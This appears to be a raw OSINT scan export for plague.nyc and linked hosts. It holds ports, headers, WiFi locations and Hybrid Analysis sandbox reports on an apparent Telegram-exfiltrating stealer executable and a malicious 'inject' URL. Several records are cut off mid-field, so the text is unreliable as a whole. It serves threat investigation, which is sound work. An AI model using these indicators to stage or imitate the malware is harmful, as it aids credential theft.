Any use of this data for any other purpose is expressly forbidden without the prior written permission of this registrar. By submitting an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not to use this data to allow, enable, or otherwise support the dissemination or collection of this data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone, postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations of any kind, including spam. You further agree not to use this data to enable high volume, automated or robotic electronic processes designed to collect or compile this data for any purpose, including mining this data for your own personal or commercial purposes. Failure to comply with these terms may result in termination of access to the Whois database. These terms may be subject to modification at any time without notice. plague.nyc 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None WestEd (Net ID: 00:02:2D:05:7E:85) 37.7803446,-122.3906132 2022-12-18 00:09:27 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.8:80 188.114.96.0/24 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None BJNPSETUP (Net ID: 00:00:85:F4:1C:9A) 37.780462,-122.390564 2022-12-18 00:06:15 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 8, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'533e42cb330c3b03136edefe566e4925d232e2e3c4cef1c641ed599a69e9c005.exe', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ip-api.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.imgbb.com"\n "api.telegram.org"\n "ip-api.com"\n "scratchyrelievedcases.ekdje3fk3rkwrj.repl.co"'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-80', u'name': u'PE file contains executable sections', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'"res2.exe" has an executable section named ".text"\n "pywintypes310.dll" has an executable section named ".text"\n "libcrypto-1_1.dll" has an executable section named ".text"\n "pythoncom310.dll" has an executable section named ".text"\n "python310.dll" has an executable section named ".text"\n "libffi-7.dll" has an executable section named ".text"\n "sqlite3.dll" has an executable section named ".text"\n "vcruntime140.dll" has an executable section named ".text"\n "libssl-1_1.dll" has an executable section named ".text"\n "_elementtree.pyd" has an executable section named ".text"\n "_ghash_clmul.pyd" has an executable section named ".text"\n "_raw_aesni.pyd" has an executable section named ".text"\n "_queue.pyd" has an executable section named ".text"\n "_SHA1.pyd" has an executable section named ".text"\n "select.pyd" has an executable section named ".text"\n "_raw_ctr.pyd" has an executable section named ".text"\n "_sqlite3.pyd" has an executable section named ".text"\n "_hashlib.pyd" has an executable section named ".text"\n "_cpuid_c.pyd" has an executable section named ".text"'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-96', u'name': u'PE file entrypoint instructions', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'"res2.exe" file has an entrypoint instructions - "testal, 0x20,jne0x1400010fe,movr14, qword ptr [rcx + 0x18],andeax, 0xffffff8f,movecx, 0x14,cmpeax, 3,je0x140001900,cmpeax, 0x80,je0x1400018b4,callqword ptr [rip + 0x958828],movr13, rax,xoreax, eax,nopdword ptr [rax],movrdx, qword ptr [r12 + rax*8],addqword ptr [rdx], 1,movqword ptr [r13 + rax*8 + 0x18], rdx,addrax, 1,cmprax, 0x14,jne0x140001128,movrdx, r13,movrcx, r14,callrbx,subqword ptr [r13], 1,movr14, rax,jne0x140000e87,movrcx, r13,"\n "pywintypes310.dll" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x1800028cd,call0x180002c14,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x180002754,int3,int3,int3,jmp0x180002ba0,int3,int3,int3,andqword ptr [rcx + 0x10], 0,learax, [rip + 0xfd10],movqword ptr [rcx], rax,movrax, rcx,movqword ptr [rcx + 8], rdx,ret,int3,pushrbx,"\n "libcrypto-1_1.dll" file has an entrypoint instructions - "jmp0x180245c38,jmp0x180222650,jmp0x180233140,jmp0x1801fc340,jmp0x1801e7430,jmp0x1800a75f0,jmp0x1801b6ff0,jmp0x18019cb20,jmp0x18015d720,jmp0x18019e030,jmp0x1800dfca0,jmp0x1801f7ed0,jmp0x1801b1950,jmp0x18019ca80,jmp0x18010b1e0,jmp0x18021d380,jmp0x1802124e0,jmp0x180234850,jmp0x1801c1060,jmp0x180246130,"\n "pythoncom310.dll" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x18001102d,call0x180011ae4,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x180010eb4,int3,int3,int3,pushrbx,subrsp, 0x20,movrbx, rcx,xorecx, ecx,callqword ptr [rip + 0x4bff3],movrcx, rbx,callqword ptr [rip + 0x4bff2],callqword ptr [rip + 0x4bfdc],movrcx, rax,"\n "python310.dll" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x18018219d,call0x1801821bc,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x180182048,int3,int3,int3,movqword ptr [rsp + 0x20], rbx,pushrbp,movrbp, rsp,subrsp, 0x20,movrax, qword ptr [rip + 0x260e30],movabsrbx, 0x2b992ddfa232,cmprax, rbx,jne0x180182253,"\n "libffi-7.dll" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x180004a15,call0x180004bb0,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x1800048c0,int3,int3,int3,pushrbx,subrsp, 0x20,movrbx, rcx,xorecx, ecx,callqword ptr [rip + 0x1603],movrcx, rbx,callqword ptr [rip + 0x15f2],callqword ptr [rip + 0x15fc],movrcx, rax,"\n "sqlite3.dll" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x18012063d,call0x18012065c,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x1801204e8,int3,int3,int3,movqword ptr [rsp + 0x20], rbx,pushrbp,movrbp, rsp,subrsp, 0x20,movrax, qword ptr [rip + 0x2d990],movabsrbx, 0x2b992ddfa232,cmprax, rbx,jne0x1801206f3,"\n "vcruntime140.dll" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x18000fe81,call0x18001028c,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x18000fde8,int3,int3,int3,movqword ptr [rsp + 0x10], rbx,movqword ptr [rsp + 0x18], rsi,pushrdi,subrsp, 0x10,xoreax, eax,xorecx, ecx,cpuid,movr8d, ecx,xorr11d, r11d,movr10d, edx,"\n "libssl-1_1.dll" file has an entrypoint instructions - "jmp0x18006ed98,jmp0x180025930,jmp0x18002aed0,jmp0x180008dd0,jmp0x18004c0d0,jmp0x18006f794,jmp0x18005a4a0,jmp0x18001aa40,jmp0x18002f940,jmp0x180067300,jmp0x180033520,jmp0x1800232d0,jmp0x18003abd0,jmp0x18002bc40,jmp0x18004c7d0,jmp0x180054370,jmp0x18001c190,jmp0x18006f8a4,jmp0x18003cb10,jmp0x18002b090,"\n "_elementtree.pyd" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x180007981,call0x180007b1c,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x18000782c,int3,int3,int3,pushrbx,subrsp, 0x20,movrbx, rcx,xorecx, ecx,callqword ptr [rip + 0xc677],movrcx, rbx,callqword ptr [rip + 0xc666],callqword ptr [rip + 0xc6a8],movrcx, rax,"\n "_ghash_clmul.pyd" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x180001371,call0x18000150c,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x18000121c,int3,int3,int3,pushrbx,subrsp, 0x20,movrbx, rcx,xorecx, ecx,callqword ptr [rip + 0x2c87],movrcx, rbx,callqword ptr [rip + 0x2c76],callqword ptr [rip + 0x2c80],movrcx, rax,"\n "_raw_aesni.pyd" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x180001381,call0x18000151c,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x18000122c,int3,int3,int3,pushrbx,subrsp, 0x20,movrbx, rcx,xorecx, ecx,callqword ptr [rip + 0x3c87],movrcx, rbx,callqword ptr [rip + 0x3c76],callqword ptr [rip + 0x3c80],movrcx, rax,"\n "_queue.pyd" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x1800014d1,call0x18000166c,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x18000137c,int3,int3,int3,pushrbx,subrsp, 0x20,movrbx, rcx,xorecx, ecx,callqword ptr [rip + 0x1b57],movrcx, rbx,callqword ptr [rip + 0x1b56],callqword ptr [rip + 0x1b40],movrcx, rax,"\n "_SHA1.pyd" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x180001381,call0x18000151c,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x18000122c,int3,int3,int3,pushrbx,subrsp, 0x20,movrbx, rcx,xorecx, ecx,callqword ptr [rip + 0x3c7f],movrcx, rbx,callqword ptr [rip + 0x3c6e],callqword ptr [rip + 0x3c78],movrcx, rax,"\n "select.pyd" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x180001511,call0x1800016ac,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x1800013bc,int3,int3,int3,pushrbx,subrsp, 0x20,movrbx, rcx,xorecx, ecx,callqword ptr [rip + 0x1b1f],movrcx, rbx,callqword ptr [rip + 0x1b1e],callqword ptr [rip + 0x1b08],movrcx, rax,"\n "_raw_ctr.pyd" file has an entrypoint instructions - "movqw 34.149.204.188 2022-12-18 00:21:13 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77b38adcf9fdbbd4-FRA"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 188.114.97.0 2022-12-18 00:22:14 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77aa1c8a4ee62aa2-ORD Content-Encoding: gzip 172.67.169.215 2022-12-18 00:04:12 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None sni.cloudflaressl.com 188.114.97.1 2022-12-18 00:25:13 Physical Location No MetaDefender 0 0 1 0 None Amsterdam, Netherlands 20.224.2.213 2022-12-18 00:20:42 Physical Location No LeakIX 0 0 3 0 None Italy 81.88.48.102 2022-12-18 00:21:37 Open TCP Port No Censys 0 0 2 0 None 20.226.83.185:5050 20.226.83.185 2022-12-18 00:10:03 Linked URL - Internal No URLScan.io 1 0 1 0 None https://plague.fun/ plague.fun 2022-12-18 00:04:01 Physical Location No ipstack 0 0 2 0 None United States 172.67.190.129 2022-12-18 00:06:03 Affiliate - Domain Name No DNS Resolver 0 0 2 0 None registrar-servers.com eforward4.registrar-servers.com 2022-12-18 00:04:32 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 87, u'compromised_hosts': [u'199.34.228.53', u'199.34.228.53', u'192.0.77.2', u'172.67.143.74', u'172.67.143.74', u'85.199.67.19', u'192.0.72.16'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://crimsonpost286.weebly.com/', u'signatures': [{u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "iexplore.exe" with commandline "http://crimsonpost286.weebly.com/" (UID: 00000000-00003424)\n Spawned process "iexplore.exe" with commandline "SCODEF:3424 CREDAT:275457 /prefetch:2" (UID: 00000000-00002572)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "iexplore.exe" with commandline "http://crimsonpost286.weebly.com/" (UID: 00000000-00003424)\n Spawned process "iexplore.exe" with commandline "SCODEF:3424 CREDAT:275457 /prefetch:2" (UID: 00000000-00002572)'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "logotype_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "TarC115.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d60_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d60_IESQMMUTEX_0_331"\n "IsoScope_d60_IESQMMUTEX_0_303"\n "IsoScope_d60_IESQMMUTEX_0_519"\n "IsoScope_d60_ConnHashTable<3424>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3424"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_d60_IE_EarlyTabStart_0xa00_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"199.34.228.53:80"\n "199.34.228.53:443"\n "216.58.195.74:443"\n "151.101.1.46:443"\n "172.217.6.42:443"\n "192.0.77.2:80"\n "37.72.175.4:80"\n "68.142.107.88:80"\n "151.101.2.152:443"\n "104.21.44.44:443"\n "172.67.143.74:80"\n "216.58.194.182:443"\n "172.67.143.74:443"\n "85.199.67.19:80"\n "138.201.16.247:80"\n "192.0.72.16:443"\n "192.154.111.219:443"\n "216.58.194.161:443"\n "104.18.20.186:80"\n "67.220.210.93:80"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"crimsonpost286.weebly.com"\n "i0.wp.com"\n "s1.dmcdn.net"\n "fernwoodneighbourhood.ca"\n "coolrom.com"\n "stroke.ahajournals.org"\n "www.pctipp.ch"\n "kwout.com"\n "forum.bmw5.co.uk"\n "ocsp.pki.goog"\n "r3.o.lencr.org"\n "cacerts.digicert.com"'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-18', u'name': u'Accesses Software Policy Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT"; Key: "")'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "iexplore.exe" (UID: 00000000-00003424) was launched with new environment variables: "PATH="%PROGRAMFILES%\\Internet Explorer;""'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-20', u'name': u'Reads Windows Trust Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 5, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINTRUST\\TRUST PROVIDERS\\SOFTWARE PUBLISHING"; Key: "STATE")'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-17', u'name': u'Accesses System Certificates Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1112', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-203', u'attck_id': u'T1112', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\MY"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA"; Key: "")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\\A377D1B1C0538833035211F4083D00FECC414DAB"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\63FEAE960BAA91E343CE2BD8B71798C76BDB77D0"; Key: "BLOB")\n "iexplore.exe" (Path: "SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT"; Key: "")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\07E032E020B72C3F192F0628A2593A19A70F069E"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\3E2BF7F2031B96F38CE6C4D8A85D3E2D58476A0F"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\4F65566336DB6598581D584A596C87934D5F2AB4"; Key: "BLOBLENGTH")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E"; Key: "BLOB")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\F18B538D1BE903B6A6F056435B171589CAF36BF2"; Key: "BLOB")\n "iexplore.exe" (Path: "SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\SMARTCARDROOT"; Key: "")\n "iexplore.exe" (Path: "SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE"; Key: "")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabC0F5.tmp" has type "Microsoft Cabinet archive data 61157 bytes 1 file"\n "CabC1E1.tmp" has type "Microsoft Cabinet archive data 61157 bytes 1 file"'}, {u'category': u'Unusual Characteristics', u'origin': u'Hook Detection', u'identifier': u'hooks-8', u'name': u'Installs hooks/patches the running process', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1056/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1056.004', u'relevance': 10, u'threat_level': 0, u'type': 11, u'description': u'"iexplore.exe" wrote bytes "c0bf986d" to virtual address "0x75A91F68" (part of module "SHELL32.DLL")\n "iexplore.exe" wrote bytes "a035976d" to virtual address "0x75A9202C" (part of module "SHELL32.DLL")\n "iexplore.exe" wrote bytes "80320801703208010032080160320801503208014032080130320801000000002cc9b975c021080100000000901708015023080100180801601f080120360801000000004036080100000000" to virtual address "0x01088000"\n "iexplore.exe" wrote bytes "b033976d" to virtual address "0x010870C0"\n "iexplore.exe" wrote bytes "b033976d" to virtual address "0x76EA14E0" (part of module "USER32.DLL")\n "iexplore.exe" wrote bytes "b033976d" to virtual address "0x757511B8" (part of module "SHLWAPI.DLL")\n "iexplore.exe" wrote bytes "60d29a6d" to virtual address "0x757513B8" (part of module "SHLWAPI.DLL")\n "iexplore.exe" wrote bytes "b033976d" to virtual address "0x7733917C" (part of module "IERTUTIL.DLL")\n "iexplore.exe" wrote bytes "3030976d" to virtual address "0x6E5FFE90" (part of module "IEFRAME.DLL")\n "iexplore.exe" wrote bytes "b033976d" to virtual address "0x74031250" (part of module "UXTHEME.DLL")\n "iexplore.exe" wrote bytes "60d29a6d" to virtual address "0x75A91D7C" (part of module "SHELL32.DLL")\n "iexplore.exe" wrote bytes "a035976d" to virtual address "0x77121144" (part of module "LPK.DLL")\n "iexplore.exe" 104.21.28.240 2022-12-18 00:07:18 HTTP Headers No Web Spider 2 0 3 0 None {"content-length": "1554", "x-powered-by": "Express", "accept-ranges": "bytes", "keep-alive": "timeout=5", "last-modified": "Sun, 11 Sep 2022 13:17:14 GMT", "connection": "keep-alive", "etag": "W/\"612-1832cb26b90\"", "cache-control": "public, max-age=0", "date": "Sun, 18 Dec 2022 00:07:18 GMT", "access-control-allow-origin": "*", "content-type": "text/css; charset=UTF-8"} http://misogyny.wtf:2020/css/index.css 2022-12-18 00:04:10 Raw Data from RIRs No Hybrid Analysis 0 0 1 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://misogyny.wtf/inject/UsRjS959Rqm4sPG4', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"misogyny.wtf"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"20.226.83.185:80"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_fe0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_fe0_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_fe0_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4064"\n "IsoScope_fe0_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "IsoScope_fe0_ConnHashTable<4064>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_fe0_IE_EarlyTabStart_0xd9c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "7XNUCQ2H.txt" - Location: 